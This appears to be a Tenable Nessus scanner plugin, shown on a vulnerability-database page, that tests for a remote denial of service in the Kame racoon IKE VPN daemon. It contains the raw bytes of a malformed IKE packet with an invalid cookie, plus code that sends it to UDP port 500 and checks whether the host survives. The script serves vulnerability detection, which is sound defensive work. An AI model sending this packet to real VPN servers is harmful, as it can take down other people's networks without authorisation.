Lucene search

K
nessusThis script is Copyright (C) 2004-2018 Tenable Network Security, Inc.RACOON_COOKIE_MALLOC_DOS.NASL
HistoryMar 31, 2004 - 12:00 a.m.

Kame Racoon Invalid Cookie Handling Remote DoS

2004-03-3100:00:00
This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.
www.tenable.com
13

The remote system appears to have a problem with processing requests with invalid cookie values. At least one VPN product (racoon) demonstrates this flaw. Racoon is integrated with:

FreeBSD 4.0 and beyond OpenBSD 2.7 and beyond NetBSD 1.5 and beyond BSD/OS 4.2 and beyond

However, the bug has only been verified on FreeBSD systems.

An attacker may use this flaw to disable your VPN remotely.

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
 script_id(12121);
 script_version("1.18");
 script_cvs_date("Date: 2018/08/13 14:32:36");


 script_name(english:"Kame Racoon Invalid Cookie Handling Remote DoS");
 script_summary(english:"Racoon invalid cookie malloc bug");

 script_set_attribute(attribute:"synopsis", value:"The remote server is vulnerable to a denial of service.");
 script_set_attribute(attribute:"description", value:
"The remote system appears to have a problem with processing requests
with invalid cookie values. At least one VPN product (racoon)
demonstrates this flaw. Racoon is integrated with:

FreeBSD 4.0 and beyond OpenBSD 2.7 and beyond NetBSD 1.5 and beyond
BSD/OS 4.2 and beyond

However, the bug has only been verified on FreeBSD systems.

An attacker may use this flaw to disable your VPN remotely.");
 script_set_attribute(attribute:"solution", value:
"If you are running racoon VPN, download and install the latest SNAP
kit from http://www.kame.net/. If you are running a non-racoon VPN
server that is crashing due to this check, consult your vendor for a
fix.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");

 script_set_attribute(attribute:"plugin_publication_date", value:"2004/03/31");

 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_KILL_HOST);
 script_copyright(english:"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.");
 script_family(english:"Denial of Service");

 script_require_keys("Settings/ParanoidReport");

 exit(0);
}

include("audit.inc");
include("global_settings.inc");
if (report_paranoia < 2) audit(AUDIT_PARANOID);

port=500;

if(!get_udp_port_state(port))
	exit(0);

cookie1 = raw_string(0xFF,0x00,0xFE,0x01,0xFD,0x02,0xFC,0x03);
cookie2 = raw_string(0x4E,0x45,0x53,0x53,0x55,0x53,0x2E,0x2E);

init = raw_string(
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x50,0x00,0x00,0x01,0x34,
0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x01,0x28,0x01,0x01,0x00,0x01,
0x03,0x00,0x00,0x24,0x01,0x01,0x00,0x00,0x80,0x01,0x00,0x05,0x80,0x02,0x00,0x02,
0x80,0x03,0x00,0x01,0x80,0x04,0x00,0x02,0x80,0x0B,0x00,0x01,0x00,0x0C,0x00,0x04,
0x00,0x20,0xC4,0x9B,0x03,0x00,0x00,0x24,0x02,0x01,0x00,0x00,0x80,0x01,0x00,0x05,
0x80,0x02,0x00,0x02,0x80,0x03,0x00,0x01,0x80,0x04,0x00,0x02,0x80,0x0B,0x00,0x01,
0x00,0x0C,0x00,0x04,0x00,0x20,0xC4,0x9B,0x03,0x00,0x00,0x24,0x03,0x01,0x00,0x00,
0x80,0x01,0x00,0x05,0x80,0x02,0x00,0x02,0x80,0x03,0x00,0x01,0x80,0x04,0x00,0x02,
0x80,0x0B,0x00,0x01,0x00,0x0C,0x00,0x04,0x00,0x20,0xC4,0x9B,0x03,0x00,0x00,0x24,
0x04,0x01,0x00,0x00,0x80,0x01,0x00,0x05,0x80,0x02,0x00,0x02,0x80,0x03,0x00,0x01,
0x80,0x04,0x00,0x02,0x80,0x0B,0x00,0x01,0x00,0x0C,0x00,0x04,0x00,0x20,0xC4,0x9B,
0x03,0x00,0x00,0x24,0x05,0x01,0x00,0x00,0x80,0x01,0x00,0x05,0x80,0x02,0x00,0x02,
0x80,0x03,0x00,0x01,0x80,0x04,0x00,0x02,0x80,0x0B,0x00,0x01,0x00,0x0C,0x00,0x04,
0x00,0x20,0xC4,0x9B,0x03,0x00,0x00,0x24,0x06,0x01,0x00,0x00,0x80,0x01,0x00,0x05,
0x80,0x02,0x00,0x02,0x80,0x03,0x00,0x01,0x80,0x04,0x00,0x02,0x80,0x0B,0x00,0x01,
0x00,0x0C,0x00,0x04,0x00,0x20,0xC4,0x9B,0x03,0x00,0x00,0x24,0x07,0x01,0x00,0x00,
0x80,0x01,0x00,0x05,0x80,0x02,0x00,0x02,0x80,0x03,0x00,0x01,0x80,0x04,0x00,0x02,
0x80,0x0B,0x00,0x01,0x00,0x0C,0x00,0x04,0x00,0x20,0xC4,0x9B,0x00,0x00,0x00,0x24,
0x08,0x01,0x00,0x00,0x80,0x01,0x00,0x05,0x80,0x02,0x00,0x02,0x80,0x03,0x00,0x01,
0x80,0x04,0x00,0x02,0x80,0x0B,0x00,0x01,0x00,0x0C,0x00,0x04,0x00,0x20,0xC4,0x9B);

# some hosts will not respond to second packet with the same Cookie ID.
init1 = cookie1 + init;
init2 = cookie2 + init;

req=raw_string(
0xFF,0x00,0xFE,0x01,0xFD,0x02,0xFC,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x01,0x00,0x00,0x00,
0x00,0x00,0x00,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0xFF,0xFF,0xFF,0xFF,0xAA,0xAA,0x99,0x88,0x77,0x66,0x55,0x44,0x33,0x22,0x46,
0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,
0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,
0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,
0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,
0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,
0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F,0x4F);


# make sure it's a vpn server by sending a valid IKE packet
soc=open_sock_udp(port);
send(socket:soc, data:init1);
r = recv(socket:soc, length:1024);
if (!r)
	exit(0, "No answer to IKE packet on port "+port+".");

# send malicious cookie packet
soc2 = open_sock_udp(port);
send(socket:soc2, data:req);
r = recv(socket:soc2, length:1024);

# see if they are still alive
# reuse the original port
send(socket:soc, data:init2);
r = recv(socket:soc, length:1024);
if (!r)
	security_warning(port:port, proto:"udp");